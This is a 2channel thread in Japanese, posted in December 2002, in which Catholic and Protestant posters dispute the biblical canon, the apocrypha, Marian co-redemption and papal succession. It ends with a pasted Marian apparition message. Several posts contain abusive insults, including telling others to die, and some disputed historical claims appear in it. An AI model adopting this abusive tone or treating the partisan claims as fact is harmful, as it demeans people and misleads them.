834 :おやつ時の散歩:02/12/11 15:14
連続投稿禁止が出て、なかなか書き込めない・・・

>>832
確かに、外典を含んでいました。
しかし、外典の取り扱いについては、今でも決着がついていません。
カトリックでさえ、外典に関しては「第二聖典」という取り扱いです。
なぜそうなのか、ご存知ですか?

835 :名無しさん@1周年:02/12/11 15:22
>>831

カルタゴ会議で聖書と聖伝を定めたのは教父だよ。
聖伝だけ無視するというあなたの説は根拠ゼロ。
バカ丸出し(w


836 :名無しさん@1周年:02/12/11 15:46
異端だと思うのは勝手でしょうが、
なぜ、槍玉に上げる必要があるのですか?
どうしてそんなにカトリックの動向が気になるのですか?

不思議だ・・・・

837 :名無しさん@1周年:02/12/11 15:47
>>834まったくの嘘です。
カトリックでは、72巻すべてを「正典」としてみとめています。
「第2聖典」というのは、未だに真偽が論議されているのではなく、
カルタゴで正典と決定されるまでの間、しばらく議論が続けられて
いた文書のことです。それをプロでは外典としているだけ。
嘘が巧みですね。W


838 :名無しさん@1周年:02/12/11 15:57
>>834
カトリックでは外典とは呼びません。
アポクリファも単なる俗称です。
カトリックでは聖典あつかいです。
七十人訳聖書の書物で、確かに「マナセの祈り」などカトリックでも外典と呼ばれる書物はあります。
あれは、本当に外典です。第二聖典でもなんでもなく、外典です。
わかりましたか。あれが、なぜアポクリファと呼ばれたか言いましょうか。
紀元後にユダヤ教のラビらがヤブナ会議で決定したマソラテキストに洩れちゃったからです。
その史実を知らなかった教会の一部の者が「アポクリファ(隠された書物)」とあだ名をつけたのです。
マソラテキストのみを正典とする新教は早く割礼でもして、ユダヤ教に逝ってくれればいいんです。

839 :名無しさん@1周年:02/12/11 16:03
>>833
誰に何を言ってる?

840 :名無しさん@1周年:02/12/11 16:06
おい、散歩野郎!見苦しいぞ!
セコイ嘘ばかりついてんじゃネエ!
カルタゴ会議を認めるんなら72巻全部認めやがれ。
おまえらの「聖典」66巻は、カルタゴ会議の所産じゃねーだろ。
教義に都合のいいのだけ選んだ16世紀の所産だろうが。
出直して来い!嘘吐き野郎!


841 :名無しさん@1周年:02/12/11 16:18
>>840
嘘とかどうとか言う前に人間としてどうなのよ?その発言

842 :名無しさん@1周年:02/12/11 16:21
>>839
カルタゴ会議を認めるなら、第1バチカン公会議も認めろっつうの。

843 :名無しさん@1周年:02/12/11 16:31
>>841偽証するワルに対する立派な発言だと思いまふ

844 :名無しさん@1周年:02/12/11 16:34
>>843
悪意のある「嘘」と、ただの「認識違い」を区別できないだけです。
理性が不足。

845 :名無しさん@1周年:02/12/11 16:34
>>841
何を言おうとウソはウソ

846 :名無しさん@1周年:02/12/11 16:36
>>844それはあなたの認識不足。「嘘」は悪意から来るのです。サタンは昔から嘘吐きです。

847 :名無しさん@1周年:02/12/11 16:39
散歩さん、また言い負かされたんだね。
最初から最後まで言い負かされてるけど、
恥ずかしくないの?



848 :名無しさん@1周年:02/12/11 16:40
テストで100点満点とらないものはみんな「嘘つき」になるぞ。
満点以外取ったことないやつだけがひとのこと「嘘つき」よばわりできるわけだな。
なるほどな。

849 :名無しさん@1周年:02/12/11 16:40
サンポはアフォです。理性がないのです。

850 :名無しさん@1周年:02/12/11 16:41
>>847
僕は散歩さんじゃないよ。

851 :名無しさん@1周年:02/12/11 16:42
>>848は「散歩」だな。
いよいよ、名無しで書く度胸がなくなったか。小心者だなw

852 :名無しさん@1周年:02/12/11 16:43
>>846
どこがどう認識不足なんだろうか?

853 :名無しさん@1周年:02/12/11 16:44
>>851
だから違うってば(笑

>いよいよ、名無しで書く度胸がなくなったか。小心者だなw
ここは理解できないんだけど、これも「嘘」の類?

854 :名無しさん@1周年:02/12/11 16:44
>>848>>850は「散歩」だな。
いよいよ、名無しでしか書く度胸がなくなったか。小心者だなw

855 :名無しさん@1周年:02/12/11 16:45
>>853俺さん、ウザイよ

856 :名無しさん@1周年:02/12/11 16:46
>>854

修正したね。えらいえらい。
そうやって失敗は補正していけばいいのさ。
そうやって大人になっていくんだからね。
他人の失敗をせせら笑うのは子供のうちだけにしておくんだね。

857 :名無しさん@1周年:02/12/11 16:48
>>848>>850>>855>>856は「散歩」だな。
いよいよ、名無しでしか書く度胸がなくなったか。小心者だなw

>>856馬鹿や老。ミスタイプと偽証をごっちゃにすんじゃネエ!
頭悪すぎるぜ。

858 :名無しさん@1周年:02/12/11 16:50
>>857

偽証?

便所の落書きと裁判所での証言の区別がつかない模様だね。

これ以上腐った文字列をモニタに写し続けるとパソコンに悪いから
もうやめるよ。

さよなら。おばかさんのおちびちゃん。

859 :名無しさん@1周年:02/12/11 16:52
>>858
ついに逃げる散歩。ざまねーな。バイチャ!
もう2度とくるなよ。
ガキが来るところじゃねんだからな。w

860 :名無しさん@1周年:02/12/11 16:54
>>プロの諸君へ

キリストの使徒と同時代に生き、勇敢に異端と戦い、
命を捨ててまで教会を守り抜き、
後の世代へ引き継いでくれた教父たちの聖書解釈を
全部無視して、自分たちの新解釈に差し替えるなんざ、
泥棒のやることだよ。恥知らず。
お前達の先駆者のほうがよほど使徒に近かったよ。
今はどうだ?先駆者の言葉さえ無視して、
母教会を執拗に陥れようとしている。
どういうつもりなんだ?
人でなしの集団よ!忘恩の徒よ!懺悔しろ!


861 :名無しさん@1周年:02/12/11 17:00
>>プロの諸君へ:キリストがペテロにかけた言葉を読みなさい。
あなた方の教会の運命が書かれています。

「あなたに言います。あなたはペテロです。わたしはこの岩の上にわたし
の教会を建てます。ハデスの門もそれには打ち勝てません。わたしは、
あなたに天の御国のかぎを上げます。何でもあなたが地上でつなぐなら、
それは天においてもつながれており、あなたが地上で解くなら、それは
天においても解かれています。」(マタイ16:18、19)

「だから、わたしのこれらのことばを聞いてそれを行なう者はみな、
岩の上に家を建てた賢い人に比べることができます。雨が降って洪水が
押し寄せ、風が吹いて家に打ちつけたが、それでも倒れませんでした。
岩の上に建てられていたからです。わたしのこれらのことばを聞いて
それを行なわない者はみな、砂の上に自分の家を建てた愚かな人に比べる
ことができます。雨が降って洪水が押し寄せ、風が吹いてその家に打ち
つけると倒れてしまいました。それはひどい倒れ方でした」(7:24‐27)

「それはひどい倒れ方でした。」―あなた方の教会のことです。

862 :名無しさん@1周年:02/12/11 17:01
馬鹿野郎!
マリヤは最初から共同贖罪者ではないし、
おまえが何を主張しても、共同贖罪者には
変身しねえんだよ。馬鹿!


863 :名無しさん@1周年:02/12/11 17:05
>>862
俺さん、ウザイです
早く、次スレ立ててよ。宣教に使うから。w

864 :名無しさん@1周年:02/12/11 17:07
>>861
教皇がペテロの後継者だと出鱈目主張すると
専業主婦が共同贖罪者に変身するのか?
大馬鹿野郎!

865 :名無しさん@1周年:02/12/11 17:13
>>864
それって。
教皇がペテロの後継者だと出鱈目主張すると
大工の息子が神の子に変身するのか?
と言ってるのと同じじゃん。
ヨハネ福音書を正典に選んだのは誰だかしっとるだろ。

866 :名無しさん@1周年:02/12/11 17:18
プロの諸君へ:

あなた方は「聖書のみ、正典のみ」と言い、
他を「偽典」、「外典」と馬鹿にしますが、正典の中に、
偽典や外典からの引用があるのはなぜですか?
いい加減、詭弁を弄するのをやめなさい。カトリックを攻撃するという
動機の元にやってるから、言うことなすこと矛盾だらけになるのです。
懺悔しなさい。


867 :名無しさん@1周年:02/12/11 17:20
プロの諸君へ:

あなた方は「聖書のみ、正典のみ」と言い、
他を「偽典」、「外典」と馬鹿にしますが、正典の中に、
偽典や外典からの引用があるのはなぜですか?
ユダは書簡の中で、偽典「エノク書」と、偽典「モーセ被昇天」を
引用しているけど?w
パウロは、ヘブライ人への手紙の中で、偽典「イザヤの昇天」(11:37)を
引用してるけど?w
いい加減、詭弁を弄するのをやめなさい。カトリックを攻撃するという
動機の元にやってるから、言うことなすこと矛盾だらけになるのです。
懺悔しなさい。

868 :名無しさん@1周年:02/12/11 17:20
>>866
信仰のみ、聖書のみ
の間違いだ!
馬鹿野郎!

869 :名無しさん@1周年:02/12/11 17:24
>>868それは間違いです。行わないといけません。

「わたしのこれらのことばを聞いてそれを行なわない者はみな、
砂の上に自分の家を建てた愚かな人に比べることができます。
雨が降って洪水が押し寄せ、風が吹いてその家に打ちつけると
倒れてしまいました。それはひどい倒れ方でした」
(マタイ7:24‐27)

870 :名無しさん@1周年:02/12/11 17:25
俺さんの負け。

871 :名無しさん@1周年:02/12/11 17:29
>>868
それなら、カトリックの信仰を受け入れなさい。

872 :名無しさん@1周年:02/12/11 17:40
俺さんの負け

873 :名無しさん@1周年:02/12/11 17:42
>>864
共同贖罪とは、キリストの贖いの苦しみを共にすることだって。罪人だったパウロに出来て、罪のないマリアにどうしてできないの?それから説明してよ。


874 :名無しさん@1周年:02/12/11 17:51
プロテスタントの諸君へ:

使徒信条を採用するなら、「聖徒の交わり」の聖徒に、
マリアを最高の聖徒として受け入れ、交わりなさい。
天上の聖徒こそ、真に贖われた初穂である。
彼らは地上の私たちの為に執り成しの祈りをなさってくださる。
地上の聖徒さえすることを、天上の聖徒が無為に過ごしているだろうか。
否、死に勝利した天上の聖徒は、まだ戦っている地上の聖徒のために
絶えず、執り成しの業をしておられるのである。
マリアはその最初にして最高の聖人である。神の母である。
プロは詭弁を弄さず良識を用いなさい。

875 :名無しさん@1周年:02/12/11 18:01
んだんだ

876 :名無しさん@1周年:02/12/11 18:05
>>874-875
自作自演するとマリヤが神の母に変身するのか?


877 :夕暮れ時の散歩:02/12/11 18:13
なんだかものすごく嫌われたみたい。。。まあいいんだけどね。
ところで、外典についてですが、ちょっとだけ書いておきます。

ブルガタ訳の聖書には、確かに13冊含まれていますよね。
ところが、セプチャギンタのものは、それより少ないはずです。
また、90年のヘブライ語聖書聖典化の際には、まったく含まれていませんでした。
だから、外典をどのように扱うかについては、難しい問題があると思います。
カトリック教会の評価が定まっているからといって、それを普遍化してはなりませぬ。

結局、カトリック教会がこれらの聖書も聖典として認めたのは、1870年のバチカン公会議においてではなかったでしょうか。

いずれにせよ、カトリック教会が正式に認めたのは、19世紀になってからだと思いますが、違いますか?

要するに、「自分たちだけが一番正しい、絶対に間違ってはいない」という態度こそ、
福音宣教の一番の障害となっているのではありますまいか。

878 :夕暮れ時の散歩:02/12/11 18:17
ただね。
何度も書いているように(そして、他のHNを使うときも書いているように)、
私たちクリスチャンは、教派や立場を超えて、仲良く親しく交わることが正しいと思いますよ。
ののしりあいからは何も生まれてきません。
違いますか?
私は、他の教派の方を、カトリックの方も含めて、ののしったことはないです。
議論を持ちかけたことはあってもね。

879 :名無しさん@1周年:02/12/11 18:18
外典にもマリヤが共同贖罪者とは書かれていない。
時間稼ぎをするとマリヤが神の母に変身するのか?

880 :名無しさん@1周年:02/12/11 18:21
>>878
どっちの味方なのか
はっきりしろ!
両方から集中攻撃されても良いのか

881 :名無しさん@1周年:02/12/11 18:23
>>873
バカ野郎!ふざけんな!

パウロは共同贖罪者ではないし
マリヤも共同贖罪者ではない!

882 :名無しさん@1周年:02/12/11 18:23
この際だから、カトの聖者全員をその共同贖罪者ってのに認定しちゃったら?


883 :名無しさん@1周年:02/12/11 18:25
>>882
ついでにニセメシア文鮮明もか?

884 :名無しさん@1周年:02/12/11 18:26
>>876
>>879
共同贖罪者と神の母は全く別々の概念だろ
共同贖罪者であって神の母ではない存在も想定可能だし、
神の母ではあるが共同贖罪者ではない存在も可能
(これは東方教会の立場だしルター派やアングリカンもそうではないか??)

大体5世紀くらいに決まった神の母と20世紀になって決まった共同贖罪者と
を並べて論じる理由を説明して。

885 :名無しさん@1周年:02/12/11 18:29
>>884
マリヤは神の母ではない。
共同贖罪者でもない。

886 :名無しさん@1周年:02/12/11 18:30
共同贖罪者とかいうのは、カトリックがマリヤ崇敬を正当化するためにデッチアゲた教義。

887 :名無しさん@1周年:02/12/11 18:34
>>877
>ブルガタ訳の聖書には、確かに13冊含まれていますよね。
>ところが、セプチャギンタのものは、それより少ないはずです。
現在、正典として認められているのは、
セプチャギンタのものよりも少ないですよ。

>また、90年のヘブライ語聖書聖典化の際には、まったく含まれていませんでした。
当たり前です。ユダヤ教のラビがヤブナ会議でそう決めたんだから。

>だから、外典をどのように扱うかについては、難しい問題があると思います。
難しくありません。新約以降のキリスト教会固有の伝承を認めるか、ユダヤ教の伝承を認めるかの問題です。
ユダヤ教の伝承を認めたければマソラテキスト、キリスト教の伝承を認めたければ72巻を正典として認めればいいのです。
>カトリック教会の評価が定まっているからといって、それを普遍化してはなりませぬ。
寝とぼけたいうな。昔から伝承としては決まってますって。
>結局、カトリック教会がこれらの聖書も聖典として認めたのは、1870年のバチカン公会議においてではなかったでしょうか。
>いずれにせよ、カトリック教会が正式に認めたのは、19世紀になってからだと思いますが、違いますか?
それを決まったと言うんです。第1バチカン公会議は使徒座宣言されてますから、変更の余地はありません。
>要するに、「自分たちだけが一番正しい、絶対に間違ってはいない」という態度こそ、
>福音宣教の一番の障害となっているのではありますまいか。
それなら、ユダヤ教に逝ってくれば。

888 :夕暮れ時の散歩:02/12/11 18:37
>>878
敵も味方もないよ。
同じクリスチャンでしょう?といいたいわけよ。

カトリックの人たちがマリア崇敬をしても、それはそれでいいではないか。
私たちがそれを強制されるというのなら、困るけどね。
私たちから見れば、カトリックはマリア崇敬をするからおかしい(他にも疑問な点は多々あるけど)、
カトリックからみれば、プロテスタントはマリア崇敬をしないからおかしい(同じく)、
というわけでしょうけどね。
私は、だからどうした?といいたいわけよ。
それなら、プロテスタント同士にも、ずいぶんとおかしな相違点がある、と思うけどね。
でも、それぞれが信じている通りに礼拝をし、祈りを捧げているのだから、それでいいんじゃないのかな?

889 :名無しさん@1周年:02/12/11 18:39
>>888
>カトリックの人たちがマリア崇敬をしても、
>それはそれでいいではないか。

だったら他で遊べば?

890 :名無しさん@1周年:02/12/11 18:40
>>889
そうですね。ここは、俺さんだけがオナニーするところだから。

891 :名無しさん@1周年:02/12/11 18:42
>>890
>そうですね。ここは、
>俺さんだけがオナニーするところだから。

と書くとマリヤが神の母に変身するのか?
大馬鹿野郎!死にやがれ!

892 :名無しさん@1周年:02/12/11 18:42
>>891
図星を言って何が悪い。

893 :夕暮れ時の散歩:02/12/11 18:43
>>887
同じことの繰り返しですな。
おっしゃっていることはすべて、カトリック内部からの見方です。
あるいは、カトリック固有の見方といってもいいでしょう。

前に書きましたが、それこそ「日本の道交法で韓国の交通規制をする」ようなものですよ。
さらに、前に書いたことを書きます。
プロテスタントは、聖書をカノンとして考え、それだけを教理の源泉と受け止めています。
ですから、カトリックの方が聖伝として大切にしておられるものも含めて、
すべてを絶えず検証しなおして歩むのです。

御言葉によって、絶えず改革されつづける教会。
それが、プロテスタント教会なのです。

894 :名無しさん@1周年:02/12/11 18:45
>>893
馬鹿言うな!
マリヤ崇敬は、明らかに神に背く行為なのだ。

895 :夕暮れ時の散歩:02/12/11 18:45
ところで、私がプロテスタントについてのことを書き込んでも、
ののしりしかかえってきませんね。
私は、できるだけ丁寧に、カトリックの方と意見を交換しようと思っているのですが、
私の書き込みに対しては、誹謗と罵りしか返ってこないのは、残念でもあります。

896 :名無しさん@1周年:02/12/11 18:52
>>877

聖書72巻を正典と決定したのは、393年が最初、
397年のカルタゴでは追認したに過ぎませんよ。
以後、一貫して、教会は、この正統性を追認しています。
19世紀に初めて決定したなんてガセネタをどこからもってきたのか。
いいかげんにしろよ。
そもそもあんたがカルタゴ会議で認められた正典しか認めない
といったんだろうが。ホンマ、嘘もいいかげんにしとけ。
終いに怒るで

897 :名無しさん@1周年:02/12/11 18:52
>>893
>同じことの繰り返しですな。
>おっしゃっていることはすべて、カトリック内部からの見方です。
>あるいは、カトリック固有の見方といってもいいでしょう。
では、他にキリスト教固有の伝承は何処にあるのでしょうか。
たかだか正教ぐらいでしょ。彼らも七十人訳聖書を正典と認めています。
にも関わらず、新約以降のユダヤ教の伝承に習うことにどういう道理があるんでしょうか。

>前に書きましたが、それこそ「日本の道交法で韓国の交通規制をする」ようなものですよ。
>さらに、前に書いたことを書きます。
それはあなた方ですよ。キリスト教に新約以降のユダヤ教の伝承を取り込むことこそ、
「日本の道交法で韓国の交通規制をする」ようなものです。
>プロテスタントは、聖書をカノンとして考え、それだけを教理の源泉と受け止めています。
その聖書の決め方も自分達の決定ではなく、ユダヤ教の決定に習っているんだから問題でしょ。
>ですから、カトリックの方が聖伝として大切にしておられるものも含めて、
>すべてを絶えず検証しなおして歩むのです。
だから言ったでしょ。正典に関しては少なくともあなたの言うとおり、第1バチカン公会議で決定されているんですから、
検討の余地は無いって。
>御言葉によって、絶えず改革されつづける教会。
ついでに、三位一体の教理も改革したら。
>それが、プロテスタント教会なのです。
まさにいい加減な教会のことを言うのですね。よくわかりました。

898 :名無しさん@1周年:02/12/11 18:54
夕暮れ時の散歩へ告ぐ:

聖書72巻を正典と決定したのは、393年が最初、
397年のカルタゴでは追認したに過ぎませんよ。
以後、一貫して、教会は、この正統性を追認しています。
19世紀に初めて決定したなんてガセネタをどこからもってきたのか。
いいかげんにしろよ。
そもそもあんたがカルタゴ会議で認められた正典しか認めない
といったんだろうが。ホンマ、嘘もいいかげんにしとけ。
終いに怒るで

899 :名無しさん@1周年:02/12/11 18:58
>>散歩へ

信じてもらいたけりゃ、リンクしろよ。匿名では幾らでも嘘が書ける。
リンクしないうちはすべてガセネタと見なす。
とにかく、ネタ元をリンクしろ。

900 :名無しさん@1周年:02/12/11 19:02
>>893>御言葉によって、絶えず改革されつづける教会。
それが、プロテスタント教会なのです。


御言葉によって、公会議を通して絶えず有機的成長を遂げる教会。
それが、カトリック教会ですが、何か?


901 :897:02/12/11 19:02
>>897
散歩さん。わざわざリンク貼ってもらわなくてもいいです。
譲歩して、あなたのおっしゃる史実を認めた上で議論しても構いません。
それでも、新約以降のユダヤ教の伝承に習う道理はまったくないはずです。

902 :名無しさん@1周年:02/12/11 19:03
>>901
自分で自分に答えてどうするの

903 :897訂正:02/12/11 19:04
>>893
散歩さん。わざわざリンク貼ってもらわなくてもいいです。
譲歩して、あなたのおっしゃる史実を認めた上で議論しても構いません。
それでも、新約以降のユダヤ教の伝承に習う道理はまったくないはずです。



904 :名無しさん@1周年:02/12/11 19:05
>>900
公会議によって迷信を正当化していく教会。
それがカトリックでは?

905 :899:02/12/11 19:05
>>901
だけどさ、散歩は嘘ばかり言ってるジャン。認識不足と弁解してるけど。だから、リンクしてほしいんだよ。どこのサイトにそんなことが書いてあるのか知りたい。

906 :名無しさん@1周年:02/12/11 19:06
>>904俺さん ウザイ


907 :897訂正:02/12/11 19:06
>>904
三位一体も迷信ですか?

908 :名無しさん@1周年:02/12/11 19:08
>>907
マリヤ崇敬は間違い。

三位一体は真理。

909 :名無しさん@1周年:02/12/11 19:09
「悪霊を追い出せ」
マルコーシュ・パブリケーション
奥山実著より引用

これも、ある先生に聞いた話ですが、追い出しの最中に、
悪霊が「どこどこなら出る」というのです。
ところが先生は、認めないで「そこはだめだ」
と拒否しました。
その先生は、どこにやろうかなと思ったのですが、
「カトリックのマリヤ像のところへ行きなさい」
と言ったのだそうです。悪霊がなんと言ったと
思いますか、
「あそこは、いっぱいいるからダメだ。満員だ」
と答えたのです。


910 :897訂正:02/12/11 19:09
>>904
散歩さんの史実に基づけば、第1バチカン公会議正典が定まったのでしょ。
もしかすると、ヨハネ福音書を正典にすることも迷信だったかもね。
プロの君たち、自分で自分の首を締めているようなものですね。

911 :名無しさん@1周年:02/12/11 19:10
>>909

イエス・キリストは、
「悪魔は初めから嘘吐きです」と言っていますよ。
プロの先生は悪魔の嘘を信じるんですか?
これは驚きましたね。

912 :897訂正:02/12/11 19:11
>>909
それがあなた方の伝承ですか。それこそ迷信。

913 :名無しさん@1周年:02/12/11 19:12
>>912
馬鹿言うな!
ある牧師が実際に経験した事実だ!
大馬鹿野郎!

914 :名無しさん@1周年:02/12/11 19:13
てか、散歩って、支離滅裂ジャン。嫌われるも何も、まともなことを書きゃいんだよ。そうすれば、プロでも好かれるよ。とにかくすぐバレル嘘は書くな。わかった?

915 :897訂正:02/12/11 19:13
>>908
散歩さんの史実に基づけば、第1バチカン公会議で正典が定まったのでしょ。
もしかすると、ヨハネ福音書を正典にすることも迷信だったかもね。
プロの君たち、自分で自分の首を締めているようなものですね。


916 :名無しさん@1周年:02/12/11 19:13
>>913俺さん、ウザイよ

917 :名無しさん@1周年:02/12/11 19:17
>>916
うざいのはオマエだ!
大馬鹿野郎!


918 :名無しさん@1周年:02/12/11 19:17
カトリック教会

主な特徴…a. ローマ法王の言葉や外典などを聖書と同等としている。
      b. マリヤ礼拝…マリヤによる救い。
      c. 洗礼など儀式、行いによる救い…幼児洗礼など
      d. 偶像礼拝…聖人・マリヤ・キリスト像を拝む。
      e. 司祭を通しての罪の赦し。
      f. 煉獄など聖書にない教えが多数、しかも強調されている等

以上の事柄等より,当教会はカトリック教会を聖書の基準から判断し,異端と考えております。正しいプロテスタント教会は当教会と同様の立場をとります。

919 :897訂正:02/12/11 19:18
>>913
義母アイコの体験を聞くのといっしょ。

920 :897訂正:02/12/11 19:19
>>918
>a. ローマ法王の言葉や外典などを聖書と同等としている。
それは俺さんでしょ。
http://life.2ch.net/test/read.cgi/psy/1037516989/
>E聖書のどこにも(外典にさえ)・・・

>b. マリヤ礼拝…マリヤによる救い。
救いの源泉はキリストと認めてますが。マリア様の執り成しはキリストがあってのこと。

>c. 洗礼など儀式、行いによる救い…幼児洗礼など
幼児洗礼の何が悪いのでしょうか?マタイ 19:14
そもそも、秘蹟(聖礼典)が救いに不可欠なものと主張したのは新教の側ですが。
だから、新教での秘蹟は「洗礼」と「聖餐」に限定したのでしょ?
一方私たちは、救いと直接関係ない「しるし」をも含めた七つのものを、
秘蹟と定めていますが。

>d. 偶像礼拝…聖人・マリヤ・キリスト像を拝む。
拝んでいるのではなく、敬ってるの。

>e. 司祭を通しての罪の赦し。
ヨハネ福 20:23 ルーテル教会でも告悔はあります。

>f. 煉獄など聖書にない教えが多数、しかも強調されている等
マタイ 12:32 人の子に言い逆らう者は赦される。しかし、聖霊に言い逆らう者は、この世でも後の世でも赦されることがない。」
赦しを必要とする後の世とは、煉獄のことです。


921 :名無しさん@1周年:02/12/11 19:20
>>散歩
>>831でこう書いたよね。
「一方プロテスタントは、カルタゴ教会会議で聖典と認められた旧新約聖書66巻だけを、
教理の源泉として認めています。」

これがそもそもの間違いだったんだよ。
1、正典を決めたのは、393年が最初。カルタゴは追認。
2、正典を決めたと言うことは、正典と聖伝を区別したということ。
聖伝は聖伝として価値を保存されて今にきている。
3、決められた正典は、66巻ではなく、72巻。
このレスだけでも、あなたは3つの間違いをおかしている。認めなさい。

922 :夜の散歩:02/12/11 19:23
またまた罵られてしまった(^^
さて、何のリンク?意味がわかりませんが。

どうやら話題が無限ループに陥ってしまっていますね。

それではちょっとだけ話題を変えます。
ウエストミンスター信仰告白によりますと、聖書の範囲は、66巻、
つまり、日本聖書協会新共同訳の範囲に限られていることが分かります。
プロテスタントの聖典理解は、おおむねこの信仰告白に沿っていると思われます。

923 :名無しさん@1周年:02/12/11 19:23
大馬鹿野郎!
マリヤ崇敬の間違いは他のスレッドで既に明らかだ!
死にやがれ!馬鹿野郎!

924 :夜の散歩:02/12/11 19:27
>>921
はい、1は認めます。
しかし、2は私は言ってませんが。
何度も言うように、プロテスタントはその聖伝を、カノンによって再解釈しているのです。
それを大切に保存し、現在に継承しているのが、カトリック教会なら、
それをカノンによって検証しなおしつつ(もちろん、他の教会的伝統も)、
歩んでいるのが、プロテスタント教会だと、もう何度も何度も言いました。
つまり、カトリックの方から見れば、そういうプロテスタントのあり方は、間違いなのですよ。そうでしょ?

925 :名無しさん@1周年:02/12/11 19:29
カトリック教会

主な特徴…a. ローマ法王の言葉や外典などを聖書と同等としている。
      b. マリヤ礼拝…マリヤによる救い。
      c. 洗礼など儀式、行いによる救い…幼児洗礼など
      d. 偶像礼拝…聖人・マリヤ・キリスト像を拝む。
      e. 司祭を通しての罪の赦し。
      f. 煉獄など聖書にない教えが多数、しかも強調されている等

以上の事柄等より,当教会はカトリック教会を聖書の基準から判断し,異端と考えております。正しいプロテスタント教会は当教会と同様の立場をとります。


926 :名無しさん@1周年:02/12/11 19:36
>>922
日本語になってねえだろう!
大馬鹿野郎!死ね!

927 :名無しさん@1周年:02/12/11 19:37
http://life.2ch.net/test/read.cgi/psy/1035117285/l50

928 :名無しさん@1周年:02/12/11 19:40
>>925、6
俺さん、ウザイよ

>>924
あなたは、カトリックの起源をいつだと思っているのですか?答えてくれないかな。

929 :名無しさん@1周年:02/12/11 19:42
>>924
そんなの何時だって良いじゃん

930 :名無しさん@1周年:02/12/11 19:43
自作自演みっともないよ。

931 :名無しさん@1周年:02/12/11 19:45
>>928は、忠告に感謝も出来ない最低の恩知らず。


932 :名無しさん@1周年:02/12/11 19:46
偶像礼拝みっともない

933 :シスター・ブリージ:02/12/11 19:59
カトリックの起源は使徒ペテロ。カトリックという語は古いですね。
エルサレムの聖シリル(315-386)は書いています。

「教会がカトリックあるいは普遍と呼ばれるのは、それが、地の果てから
果てへ、全世界に広がっているからである。また、それがカトリックと呼
ばれるのは、見えるものも見えないものも、天国の実在も、地上のことも
含め、人間に知らされるべき教理のすべてを、十分に、まちがわずに教え
ているからである。」
http://www.satucket.com/lectionary/Cyril_Jerusalem.htm

934 :名無しさん@1周年:02/12/11 20:08
散歩さんへ。
エキュメニカル公会議で最初に追認されたのは、
第一バチカン公会議(1869-1870年)ではなく、トレント公会議(1545年-1563年)でした。
これは、ピオ4世の大勅書により不可謬性が成立っています。
またこの公会議の内容にApocrypha等のマソラテキストと区別するような表現は一切ありません。
http://history.hanover.edu/texts/trent/ct04.html

935 :シスター・ブリージ:02/12/11 20:11
初代ローマ司教(カトリック教皇)はペテロです。
聖イレナエス(180年頃)は、ペテロがローマで殉教したと証しています。
(゛To the Romans゛)
ペテロの後継者としてローマ司教を継いだのはリヌスだったと、
イレナエスは書いています。(Adversus Haereses, 3, 3, 3)
リヌスは聖書にも記載されています。
パウロは2テモテ4:21で、リヌスに挨拶を送っていますよ。

936 :シスター・ブリージ:02/12/11 20:17

ですから、カトリックが最初に72巻の聖書を決定したのは、
393年のヒッポレシウス教会会議でありまして、
第1バチカン公会議ではありませんね。

937 :名無しさん@1周年:02/12/11 20:24
>>936
自分で考えて自分の意見を言ったら?

938 :名無しさん@1周年:02/12/11 20:25
>>936
あなたみたいな狂信的な人がいるとカトリックのイメージダウンになりますよ。
皆、迷惑しています。

939 :シスター・ブリージ:02/12/11 20:30
>>937>>938
あら、考えてるけど?
プロの皆さんがうたがい深いから、
いちいち納得できる資料で説明しているんでしょうが。
あなた方メジュ反対派はもう論破されたのですから、
来ないでくださいね。

940 :聖母:02/12/11 20:31
 白い十字架はロザリオの一連の間に形成し始めました。空の深奥に十
字架があり、聖櫃から霧が現れました。それは虹色の円で、上に漂って
います。ちょうど戸口の上です。それは梁の交差した中心に目で見えま
す。聖ミカエルは他の6位の大天使と共にVの形の上下逆に並び、先頭
に立って私達の方へ下りてきます。いろいろな色の珠のロザリオのセッ
トが梁の交差したところから垂れています。一つのとても薄い光の光線
が、十字架から聖櫃の方へ来ます。光線の上の光は多くのロザリオを照
らしています。5連のロザリオです。道を形成します。それは宝石のよ
うに見えます。なぜなら、それは空の輝きの中できらめいているからで
す。聖バラキエルは十字架像の左に立ちます。

941 :聖母:02/12/11 20:33
 戸口が開き、ロザリオの光の「道」の上を滑るように白い光を通って
天使たちが来ます。彼らは金の服を着て、上にチュニクを羽織り、胸に
は白い十字架があります。多くの天使たちか白い十字架を通って来ます。
今、聖母が天使たちと光の上をゆっくり滑り下りて来られます。多くの
天使が彼女の後ろにいて、彼らも金の服を看ています。聖母の装いは美
しく、白いガウンの上にロイヤル・ブルーのマンティラを羽織っていま
す。彼女のお顔の上には細長い金の王冠があり、三つの突き出たものが
あります。エメラルドの石は前面に、両側には美しいバラとバラ結びが
あります。

942 :名無しさん@1周年:02/12/11 20:33
カトリック教会

主な特徴…a. ローマ法王の言葉や外典などを聖書と同等としている。
      b. マリヤ礼拝…マリヤによる救い。
      c. 洗礼など儀式、行いによる救い…幼児洗礼など
      d. 偶像礼拝…聖人・マリヤ・キリスト像を拝む。
      e. 司祭を通しての罪の赦し。
      f. 煉獄など聖書にない教えが多数、しかも強調されている等

以上の事柄等より,当教会はカトリック教会を聖書の基準から判断し,異端と考えております。正しいプロテスタント教会は当教会と同様の立場をとります。

943 :聖母:02/12/11 20:33
 聖母は非常に堂々と見えます。彼女も同じように素早く私たちの方に
滑って来られ、彼女のマンティラはそよ風に波打っています。聖母は近
づいて来られ、聖堂の内陣に立たれます。彼女はとてもきれいです。明
るい茶色または金色の髪が見えます。聖母は大珠が金で、白い真珠のロ
ザリオを右手にお持ちです。十字架像は金です。聖母は祈りの形に手を
合わせられ、御頭を天に上げられます。彼女の御目は天に向いています。
すべての天使は同じことをします。大天使は立って、すべての他の天使
と共に半円を作ります。聖ミカエルは彼らの後ろで中央に立っています。
彼は他の天使達よりとても背が高いです。彼が翼を広げると、天の宮廷
を覆う天蓋を保護するように見えます。その翼は空の大部分を占め、白
い十字架を見ることはできません。

 聖母は微笑まれ、私に、彼女の胸で印を見せてくださいます。聖なる
天使たちも同じことをします。それから十字架像を取り上げ、イエズス
に接吻されます。

944 :聖母:02/12/11 20:34
 聖父と聖子と聖霊との御名によりて。アーメン。私は「小さきバルト
ロメオ」とすべての弟子たちに挨拶します。「小さき者」として知られ
る私の娘にも挨拶します。私はダビデの王家と、私の前に集まっている
すべての私の甘美なる子供たちを、聖にして母なる公教会を通して挨拶
します。

945 :シスター・ブリージ:02/12/11 20:34
>>940また、反対派の嫌がらせですか?
そんなことをしたって、メジュゴリエの聖母は
悪魔にはなりませんけど?
いい加減悪あがきはよしなさいよ。恥ずかしい。

946 :聖母:02/12/11 20:34
 私の甘美なる子供たちよ、今日、私は私の「真理の武器」である聖な
